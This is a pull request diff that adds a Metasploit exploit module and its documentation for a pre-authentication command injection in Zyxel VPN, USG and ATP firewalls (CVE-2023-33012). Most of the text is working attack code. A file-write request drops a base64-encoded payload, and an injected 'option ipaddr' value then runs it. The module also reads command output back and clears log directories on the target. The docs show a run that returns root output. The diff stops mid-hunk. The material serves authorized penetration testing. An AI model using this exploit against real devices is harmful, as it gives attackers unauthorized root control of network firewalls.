### PR TITLE
Zyxel VPN Series Pre-auth Command Injection

### DIFF
--- a/documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md
+++ b/documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md
@@ -24,6 +24,13 @@ Two caveats of this exploit chain were described by Jacob Baines in the followin
 This module was tested against USG Flex Version (???). To test this module you will need to acquire a hardware device
 running one of the vulnerable firmware versions listed above.
 
+## Options
+
+### WRITEABLE_DIR
+
+This indicates the location where you would like the payload and exploit stored, as well
+as serving as a location to store the various files and directories created by the exploit itself.
+The default value is `/tmp`
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md
+++ b/documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md
@@ -1,0 +1,38 @@
+## Vulnerable Application
+This module exploits multiple vulnerabilities in order to obtain pre-auth command injection the multiple Zyxel device models.
+The exploit chain uses CVE-2023-33012 which is a command injection vulnerability which can be exploited when uploading a
+new configuration to /ztp/cgi-bin/parse_config.py by appending a command to the `option ipaddr ` field.
+
+The command injection is length limited to 0x14 bytes and is why this exploit chains a .qsr file write vulnerability as
+well in order to write the payload to a file which has no length limit and then call the payload with the command
+injection.
+
+Two caveats of this exploit chain were described by Jacob Baines in the following
+[blog post](https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot).
+1. In order for the target to be vulnerable Cloud Management Mode (SD-WAN mode) must be enable (it is not by default).
+2. The target can only be exploited once due to the order of operations in which the exploit functions.
+
+| Product                           | Affected Versions               |
+|-----------------------------------|----------------------------------|
+| ATP                               | V5.10 through V5.36 Patch 2      |
+| USG FLEX                          | V5.00 through V5.36 Patch 2      |
+| USG FLEX 50(W) / USG20(W)-VPN     | V5.10 through V5.36 Patch 2      |
+| VPN                               | V5.00 through V5.36 Patch 2      |
+
+### Setup
+
+This module was tested against USG Flex Version (???). To test this module you will need to acquire a hardware device
+running one of the vulnerable firmware versions listed above.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use zyxel_parse_config_rce`
+1. Set the `RHOST` and `LHOST`
+1. Run the module
+1. Receive a Meterpreter session as the `root` user.
+
+## Scenarios
+### USG Flex Version (???)
+

--- a/documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md
+++ b/documentation/modules/exploit/linux/http/zyxel_parse_config_rce.md
@@ -21,8 +21,7 @@ Two caveats of this exploit chain were described by Jacob Baines in the followin
 
 ### Setup
 
-This module was tested against USG Flex Version (???). To test this module you will need to acquire a hardware device
-running one of the vulnerable firmware versions listed above.
+To test this module you will need to acquire a hardware device running one of the vulnerable firmware versions listed above.
 
 ## Options
 
@@ -41,5 +40,21 @@ The default value is `/tmp`
 1. Receive a Meterpreter session as the `root` user.
 
 ## Scenarios
-### USG Flex Version (???)
+### Mock USG Flex environment
+```
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set payload cmd/unix/generic
+payload => cmd/unix/generic
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set cmd id
+cmd => id
+msf6 exploit(linux/http/zyxel_parse_config_rce) > set AllowNoCleanup true
+AllowNoCleanup => true
+msf6 exploit(linux/http/zyxel_parse_config_rce) > run
 
+[*] Attempting to upload the payload via QSR file write...
+[+] File write was successful.
+[+] Command output:
+uid=0(root) gid=0(root) groups=0(root)
+
+[!] This exploit may require manual cleanup of '/tmp/N.qsr' on the target
+[*] Exploit completed, but no session was created.
+```

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -52,6 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
+        OptBool.new('SHOW_CMD_OUTPUT', [true, 'When true the module will query the logs for the injected command\'s stdout', false])
       ]
     )
   end
@@ -154,6 +155,25 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
       'data' => data.to_s
     })
+
+    # If the payload being used is for example cmd/unix/generic and not a payload spawning a reverse connection we can
+    # query the /ztp/cgi-bin/dumpztplog.py for the stdout of the command and print it for the user.
+    if payload_instance.connection_type == 'none'
+      cmd_output_res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')
+      })
+
+      if cmd_output_res&.body && !cmd_output_res.body.empty?
+        output = cmd_output_res.body.split("</head>\n<body>")[1]
+        output = output.split("</body>\n</html>")[0]
+        output = output.gsub("\n\n<br>", '')
+        output = output.gsub("[IPC]IPC result: 1\n", '')
+        print_good("Command output: #{output}")
+      else
+        print_error("Could not retrieve the command's stout from /ztp/cgi-bin/dumpztplog.py")
+      end
+    end
 
     unless cmd_injection_res && !cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
       fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -1,0 +1,137 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Zyxel parse_config.py Command Injection',
+        'Description' => %q(
+          This here module exploits Zyxel
+        ),
+        'Author'      =>
+          [
+            'SSD Secure Disclosure technical team', # discovery
+            'jheysel-r7'  # module
+          ],
+        'References'  =>
+          [
+            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],
+            [ 'CVE', '2023-33012']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['linux', 'unix'],
+        'Privileged'     => true,
+        'Arch'           => [ ARCH_CMD ],
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '',
+        'Notes'           =>
+		  {
+		    'Stability'   => [ CRASH_SAFE, ],
+		    'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+		    'Reliability' => [ REPEATABLE_SESSION, ],
+		  },
+      )
+    )
+
+    # register_options(
+    #   [
+    #
+    #   ],
+    # )
+  end
+
+  # def fingerprint_method1
+  #
+  # end
+  #
+  # def fingerprint_method2
+  #
+  # end
+
+  def check
+    res = send_request_cgi({
+                             'method' => 'GET',
+                             'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js'),
+                           })
+    return CheckCode::Unknown if res.nil?
+
+    if res.code == 200 && res.body =~ /ZLDCONFIG_CLOUD_HELP_VERSION=(\w+)/
+      return CheckCode::Appears("Detected #{Regexp.last_match(1)}.") if Rex::Version.new(Regexp.last_match(1)) < Rex::Version.new('5.36')
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    # Command injection has a  0x14 byte length limit so keep the file name smol.
+    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection. #
+    filename = rand_text_alpha(1)
+
+    command = payload.encoded
+    command += <<-CMD
+2>/var/log/ztplog 1>/var/log/ztplog
+(sleep 10 && /bin/rm -rf /tmp/#{filename}.qsr /share/ztp/* /var/log/* /db/etc/zyxel/ftp/tmp/coredump/* /tmp/sdwan_interface/*) &
+    CMD
+    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > /tmp/#{filename}.qsr ; . /tmp/#{filename}.qsr"
+
+    file_write_pload = "option proto vti\n"
+    file_write_pload += "option #{command};exit\n"
+    file_write_pload += "option name 1\n"
+
+    config = Base64.strict_encode64(file_write_pload)
+    data = { "config" => config, "fqdn" => "\x00" }
+    print_status('Attempting to upload the payload via QSR file write...')
+
+    file_write_res = send_request_cgi({
+                             'method' => 'POST',
+                             'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
+                             'data' => data.to_s,
+                           })
+    fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if file_write_res && file_write_res.body.include?('ParseError: 0xC0DE0005')
+    register_files_for_cleanup("/tmp/#{filename}.qsr")
+    print_good('File write was successful.')
+
+    cmd_injection_pload  = "option proto gre\n"
+    cmd_injection_pload += "option name 0\n"
+    cmd_injection_pload += "option ipaddr ;. /tmp/#{filename}.qsr;\n"
+    cmd_injection_pload += "option netmask 24\n"
+    cmd_injection_pload += "option gateway 0\n"
+    cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"
+    cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"
+    config = Rex::Text.encode_base64(cmd_injection_pload)
+    data = { "config" => config, "fqdn" => "\x00" }
+
+    cmd_injection_res = send_request_cgi({
+                             'method' => 'POST',
+                             'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
+                             'data' => data.to_s,
+                           })
+
+    fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if cmd_injection_res && cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
+
+    #Unecessary if running a fetch payload though adding for testing
+    cmd_ouput_res = send_request_cgi({
+                             'method' => 'GET',
+                             'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py'),
+                           })
+
+    output = cmd_ouput_res.body.split("</head>\n<body>")[1]
+    output = output.split("</body>\n</html>")[0]
+    output = output.gsub("\n\n<br>", "")
+    output = output.gsub("[IPC]IPC result: 1\n", "")
+    print_good("Command output: #{output}" )
+
+  end
+end

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -15,8 +16,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Zyxel parse_config.py Command Injection',
         'Description' => %q{
-          This module exploits vulnerabilities in multiple Zyxel Products including VPN and USG devices (hopefully,
-          this is still in draft at the time of writing). The affected firmware version is 5.21 thru to 5.36.
+          This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.
+          The affected firmware versions depend on the device module, see this module's documentation for more details.
         },
         'Author' => [
           'SSD Secure Disclosure technical team', # discovery
@@ -38,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
-          'Reliability' => [ REPEATABLE_SESSION, ]
+          'Reliability' => [ ] # This vulnerability can only be exploited once, more info: https://vulncheck.com/blog/zyxel-cve-2023-33012#you-get-one-shot
         }
       )
     )
@@ -57,12 +58,25 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?
 
-    if res.code == 200 && res.body =~ /ZLDCONFIG_CLOUD_HELP_VERSION=(\w+)/
-      return CheckCode::Appears("Detected #{Regexp.last_match(1)}.") if Rex::Version.new(Regexp.last_match(1)) < Rex::Version.new('5.36')
+    if res.code == 200
+      product_match = res.body.match(/ZLDSYSPARM_PRODUCT_NAME1="([^"]*)"/)
+      version_match = res.body.match(/ZLDCONFIG_CLOUD_HELP_VERSION=([\d.]+)/)
 
-      return CheckCode::Safe
+      if product_match && version_match
+        product = product_match[1]
+        version = version_match[1]
+
+        if (product.starts_with?('USG') && product.includes?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
+           (product.starts_with?('USG') && !product.includes?('W') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00')) ||
+           (product.starts_with?('ATP') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.10')) ||
+           (product.starts_with?('VPN') && Rex::Version.new(version) <= Rex::Version.new('5.36.2') && Rex::Version.new(version) >= Rex::Version.new('5.00'))
+          return CheckCode::Appears("Product: #{product}, Version: #{version}")
+        else
+          return CheckCode::Safe("Product: #{product}, Version: #{version}")
+        end
+      end
     end
-    CheckCode::Unknown('Version info was not found.')
+    CheckCode::Unknown('Version and product info were unable to be determined.')
   end
 
   def exploit
@@ -74,7 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
     command = payload.encoded
     command += <<~CMD
       2>/var/log/ztplog 1>/var/log/ztplog
-      (sleep 10 && /bin/rm -rf #{payload_filepath} /share/ztp/* /var/log/* /db/etc/zyxel/ftp/tmp/coredump/* /tmp/sdwan_interface/*) &
+      (sleep 10 && /bin/rm -rf #{payload_filepath}) &
     CMD
     command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"
 
@@ -91,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
       'data' => data.to_s
     })
-    fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if file_write_res && file_write_res.body.include?('ParseError: 0xC0DE0005')
+    fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful') if file_write_res && file_write_res.body.include?('ParseError: 0xC0DE0005')
     register_files_for_cleanup(payload_filepath)
     print_good('File write was successful.')
 
@@ -111,18 +125,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => data.to_s
     })
 
-    fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if cmd_injection_res && cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
-
-    # Unecessary if running a fetch payload though adding for testing
-    cmd_ouput_res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')
-    })
-
-    output = cmd_ouput_res.body.split("</head>\n<body>")[1]
-    output = output.split("</body>\n</html>")[0]
-    output = output.gsub("\n\n<br>", '')
-    output = output.gsub("[IPC]IPC result: 1\n", '')
-    print_good("Command output: #{output}")
+    fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful') if cmd_injection_res && cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
   end
 end

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Author' => [
           'SSD Secure Disclosure technical team', # discovery
-          'jheysel-r7' # module
+          'jheysel-r7',    # Msf module
+          'Jacob Baines',  # Testing
         ],
         'References' => [
           [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -4,7 +4,8 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+
+  Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
@@ -18,6 +19,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module exploits vulnerabilities in multiple Zyxel devices including the VPN, USG and APT series.
           The affected firmware versions depend on the device module, see this module's documentation for more details.
+
+          Note this module was unable to be tested against a real Zyxel device and was tested against a mock environment.
+          If you run into any issues testing this in a real environment we kindly ask you raise an issue in
+          metasploit's github repository: https://github.com/rapid7/metasploit-framework/issues/new/choose
         },
         'Author' => [
           'SSD Secure Disclosure technical team', # discovery

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -15,7 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name'        => 'Zyxel parse_config.py Command Injection',
         'Description' => %q(
-          This here module exploits Zyxel
+          This module exploits vulnerabilities in multiple Zyxel Products including VPN and USG devices (hopefully,
+          this is still in draft at the time of writing). The affected firmware version is 5.21 thru to 5.36.
         ),
         'Author'      =>
           [
@@ -36,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'Automatic Target', {}]
           ],
         'DefaultTarget' => 0,
-        'DisclosureDate' => '',
+        'DisclosureDate' => '2024-01-24',
         'Notes'           =>
 		  {
 		    'Stability'   => [ CRASH_SAFE, ],
@@ -46,45 +47,40 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     )
 
-    # register_options(
-    #   [
-    #
-    #   ],
-    # )
+    register_options(
+      [
+        OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
+      ],
+    )
   end
 
-  # def fingerprint_method1
-  #
-  # end
-  #
-  # def fingerprint_method2
-  #
-  # end
 
   def check
     res = send_request_cgi({
                              'method' => 'GET',
                              'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js'),
                            })
-    return CheckCode::Unknown if res.nil?
+    return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?
 
     if res.code == 200 && res.body =~ /ZLDCONFIG_CLOUD_HELP_VERSION=(\w+)/
       return CheckCode::Appears("Detected #{Regexp.last_match(1)}.") if Rex::Version.new(Regexp.last_match(1)) < Rex::Version.new('5.36')
-      CheckCode::Safe
+      return CheckCode::Safe
     end
+    CheckCode::Unknown("Version info was not found.")
   end
 
   def exploit
-    # Command injection has a  0x14 byte length limit so keep the file name smol.
-    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection. #
+    # Command injection has a 0x14 byte length limit so keep the file name as small as possible.
+    # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.
     filename = rand_text_alpha(1)
+    payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"
 
     command = payload.encoded
     command += <<-CMD
 2>/var/log/ztplog 1>/var/log/ztplog
-(sleep 10 && /bin/rm -rf /tmp/#{filename}.qsr /share/ztp/* /var/log/* /db/etc/zyxel/ftp/tmp/coredump/* /tmp/sdwan_interface/*) &
+(sleep 10 && /bin/rm -rf #{payload_filepath} /share/ztp/* /var/log/* /db/etc/zyxel/ftp/tmp/coredump/* /tmp/sdwan_interface/*) &
     CMD
-    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > /tmp/#{filename}.qsr ; . /tmp/#{filename}.qsr"
+    command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"
 
     file_write_pload = "option proto vti\n"
     file_write_pload += "option #{command};exit\n"
@@ -100,12 +96,12 @@ class MetasploitModule < Msf::Exploit::Remote
                              'data' => data.to_s,
                            })
     fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if file_write_res && file_write_res.body.include?('ParseError: 0xC0DE0005')
-    register_files_for_cleanup("/tmp/#{filename}.qsr")
+    register_files_for_cleanup(payload_filepath)
     print_good('File write was successful.')
 
     cmd_injection_pload  = "option proto gre\n"
     cmd_injection_pload += "option name 0\n"
-    cmd_injection_pload += "option ipaddr ;. /tmp/#{filename}.qsr;\n"
+    cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n"
     cmd_injection_pload += "option netmask 24\n"
     cmd_injection_pload += "option gateway 0\n"
     cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"
@@ -132,6 +128,5 @@ class MetasploitModule < Msf::Exploit::Remote
     output = output.gsub("\n\n<br>", "")
     output = output.gsub("[IPC]IPC result: 1\n", "")
     print_good("Command output: #{output}" )
-
   end
 end

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -80,6 +80,27 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Unknown('Version and product info were unable to be determined.')
   end
 
+  def on_new_session(session)
+    super
+    command_output = ''
+    # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs.
+    if session.type.to_s.eql? 'meterpreter'
+      newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\""
+      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")
+      command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\""
+    elsif session.type.to_s.eql? 'shell'
+      newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1"
+      print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.")
+      command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success"
+    end
+
+    if command_output.includes?('success')
+      print_good('The GRE interface was successfully removed.')
+    else
+      print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed')
+    end
+  end
+
   def exploit
     # Command injection has a 0x14 byte length limit so keep the file name as small as possible.
     # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -13,60 +13,56 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name'        => 'Zyxel parse_config.py Command Injection',
-        'Description' => %q(
+        'Name' => 'Zyxel parse_config.py Command Injection',
+        'Description' => %q{
           This module exploits vulnerabilities in multiple Zyxel Products including VPN and USG devices (hopefully,
           this is still in draft at the time of writing). The affected firmware version is 5.21 thru to 5.36.
-        ),
-        'Author'      =>
-          [
-            'SSD Secure Disclosure technical team', # discovery
-            'jheysel-r7'  # module
-          ],
-        'References'  =>
-          [
-            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],
-            [ 'CVE', '2023-33012']
-          ],
-        'License'        => MSF_LICENSE,
-        'Platform'       => ['linux', 'unix'],
-        'Privileged'     => true,
-        'Arch'           => [ ARCH_CMD ],
-        'Targets'        =>
-          [
-            [ 'Automatic Target', {}]
-          ],
+        },
+        'Author' => [
+          'SSD Secure Disclosure technical team', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/'],
+          [ 'CVE', '2023-33012']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['linux', 'unix'],
+        'Privileged' => true,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2024-01-24',
-        'Notes'           =>
-		  {
-		    'Stability'   => [ CRASH_SAFE, ],
-		    'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
-		    'Reliability' => [ REPEATABLE_SESSION, ],
-		  },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
       )
     )
 
     register_options(
       [
         OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
-      ],
+      ]
     )
   end
 
-
   def check
     res = send_request_cgi({
-                             'method' => 'GET',
-                             'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js'),
-                           })
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'ext-js', 'app', 'common', 'zld_product_spec.js')
+    })
     return CheckCode::Unknown('No response from /ext-js/app/common/zld_product_spec.js') if res.nil?
 
     if res.code == 200 && res.body =~ /ZLDCONFIG_CLOUD_HELP_VERSION=(\w+)/
       return CheckCode::Appears("Detected #{Regexp.last_match(1)}.") if Rex::Version.new(Regexp.last_match(1)) < Rex::Version.new('5.36')
+
       return CheckCode::Safe
     end
-    CheckCode::Unknown("Version info was not found.")
+    CheckCode::Unknown('Version info was not found.')
   end
 
   def exploit
@@ -76,9 +72,9 @@ class MetasploitModule < Msf::Exploit::Remote
     payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"
 
     command = payload.encoded
-    command += <<-CMD
-2>/var/log/ztplog 1>/var/log/ztplog
-(sleep 10 && /bin/rm -rf #{payload_filepath} /share/ztp/* /var/log/* /db/etc/zyxel/ftp/tmp/coredump/* /tmp/sdwan_interface/*) &
+    command += <<~CMD
+      2>/var/log/ztplog 1>/var/log/ztplog
+      (sleep 10 && /bin/rm -rf #{payload_filepath} /share/ztp/* /var/log/* /db/etc/zyxel/ftp/tmp/coredump/* /tmp/sdwan_interface/*) &
     CMD
     command = "echo #{Rex::Text.encode_base64(command)} | base64 -d > #{payload_filepath} ; . #{payload_filepath}"
 
@@ -87,19 +83,19 @@ class MetasploitModule < Msf::Exploit::Remote
     file_write_pload += "option name 1\n"
 
     config = Base64.strict_encode64(file_write_pload)
-    data = { "config" => config, "fqdn" => "\x00" }
+    data = { 'config' => config, 'fqdn' => "\x00" }
     print_status('Attempting to upload the payload via QSR file write...')
 
     file_write_res = send_request_cgi({
-                             'method' => 'POST',
-                             'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
-                             'data' => data.to_s,
-                           })
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
+      'data' => data.to_s
+    })
     fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if file_write_res && file_write_res.body.include?('ParseError: 0xC0DE0005')
     register_files_for_cleanup(payload_filepath)
     print_good('File write was successful.')
 
-    cmd_injection_pload  = "option proto gre\n"
+    cmd_injection_pload = "option proto gre\n"
     cmd_injection_pload += "option name 0\n"
     cmd_injection_pload += "option ipaddr ;. #{payload_filepath};\n"
     cmd_injection_pload += "option netmask 24\n"
@@ -107,26 +103,26 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd_injection_pload += "option localip #{Faker::Internet.private_ip_v4_address}\n"
     cmd_injection_pload += "option remoteip #{Faker::Internet.private_ip_v4_address}\n"
     config = Rex::Text.encode_base64(cmd_injection_pload)
-    data = { "config" => config, "fqdn" => "\x00" }
+    data = { 'config' => config, 'fqdn' => "\x00" }
 
     cmd_injection_res = send_request_cgi({
-                             'method' => 'POST',
-                             'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
-                             'data' => data.to_s,
-                           })
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
+      'data' => data.to_s
+    })
 
     fail_with(Failure::UnexpectedReply, 'The response from the target indicates the payload transfer was unsuccessful') if cmd_injection_res && cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
 
-    #Unecessary if running a fetch payload though adding for testing
+    # Unecessary if running a fetch payload though adding for testing
     cmd_ouput_res = send_request_cgi({
-                             'method' => 'GET',
-                             'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py'),
-                           })
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'dumpztplog.py')
+    })
 
     output = cmd_ouput_res.body.split("</head>\n<body>")[1]
     output = output.split("</body>\n</html>")[0]
-    output = output.gsub("\n\n<br>", "")
-    output = output.gsub("[IPC]IPC result: 1\n", "")
-    print_good("Command output: #{output}" )
+    output = output.gsub("\n\n<br>", '')
+    output = output.gsub("[IPC]IPC result: 1\n", '')
+    print_good("Command output: #{output}")
   end
 end

--- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb
+++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     filename = rand_text_alpha(1)
     payload_filepath = "#{datastore['WRITABLE_DIR']}/#{filename}.qsr"
 
-    command = payload.encoded
+    command = payload.raw
     command += <<~CMD
       2>/var/log/ztplog 1>/var/log/ztplog
       (sleep 10 && /bin/rm -rf #{payload_filepath}) &
@@ -127,9 +127,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'ztp', 'cgi-bin', 'parse_config.py'),
       'data' => data.to_s
     })
-    fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful') if file_write_res && file_write_res.body.include?('ParseError: 0xC0DE0005')
+    unless file_write_res && !file_write_res.body.include?('ParseError: 0xC0DE0005')
+      fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful')
+    end
+
     register_files_for_cleanup(payload_filepath)
-    print_good('File write was successful.')
+    print_good("File write was successful, uploaded: #{payload_filepath}")
 
     cmd_injection_pload = "option proto gre\n"
     cmd_injection_pload += "option name 0\n"
@@ -147,6 +150,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => data.to_s
     })
 
-    fail_with(Failure::PayloadFailed, 'The response from the target indicates the payload transfer was unsuccessful') if cmd_injection_res && cmd_injection_res.body.include?('ParseError: 0xC0DE0005')
